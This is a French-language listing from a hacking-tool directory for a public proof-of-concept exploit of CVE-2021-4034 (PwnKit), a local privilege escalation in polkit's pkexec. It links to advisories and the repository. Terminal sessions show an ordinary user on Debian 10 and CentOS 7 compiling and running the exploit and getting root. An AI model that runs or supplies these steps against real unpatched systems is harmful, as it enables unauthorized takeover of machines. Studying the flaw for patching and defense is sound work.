Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
POC-CVE-2021-4034 — Preuve de concept d'exploitation pour CVE-2021-4034 (PwnKit), une élévation de privilèges locale dans pkexec de polkit, vérifiée sur Debian 10 et CentOS 7. | Kitploit
Outils/GitHubGitHub/yakumwamba/poc-cve-2021-4034
Escalade de PrivilègesFrameworks d'ExploitationAnalyse des VulnérabilitésExploitationTests d'Intrusion
GitHubyakumwamba/poc-cve-2021-4034

POC-CVE-2021-4034

Preuve de concept d'exploitation pour CVE-2021-4034 (PwnKit), une élévation de privilèges locale dans pkexec de polkit, vérifiée sur Debian 10 et CentOS 7.

Voir le dépôt
423il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

polkit-bug

CVE-2021-4034

Bien que la vulnérabilité ne soit pas exploitable à distance et ne permette pas, en soi, l'exécution de code arbitraire, elle peut être utilisée par des attaquants ayant déjà obtenu un point d'appui sur un hôte vulnérable pour élever leurs privilèges et atteindre cette capacité.

https://seclists.org/oss-sec/2022/q1/80https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

PoC

Vérifié sur Debian 10 et CentOS 7.

Vous pouvez trouver le dépôt à ce lien ici → https://github.com/Yakumwamba/POC-CVE-2021-4034.git

root@kitploit:~
user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(user)
root@kitploit:~
[user@centos ~]$ grep PRETTY /etc/os-release
PRETTY_NAME="CentOS Linux 7 (Core)"
[user@centos ~]$ id
uid=11000(user) gid=11000(user) groups=11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[user@centos ~]$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
[user@centos ~]$ ./cve-2021-4034-poc
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit

Avertissement - cet outil peut être utilisé à des fins malveillantes

Il peut également être utilisé pour endommager ou désactiver des serveurs Linux non corrigés. L'auteur de cet outil n'est pas responsable des dommages ou pertes qui pourraient survenir à la suite de son utilisation.

Télécharger l’outil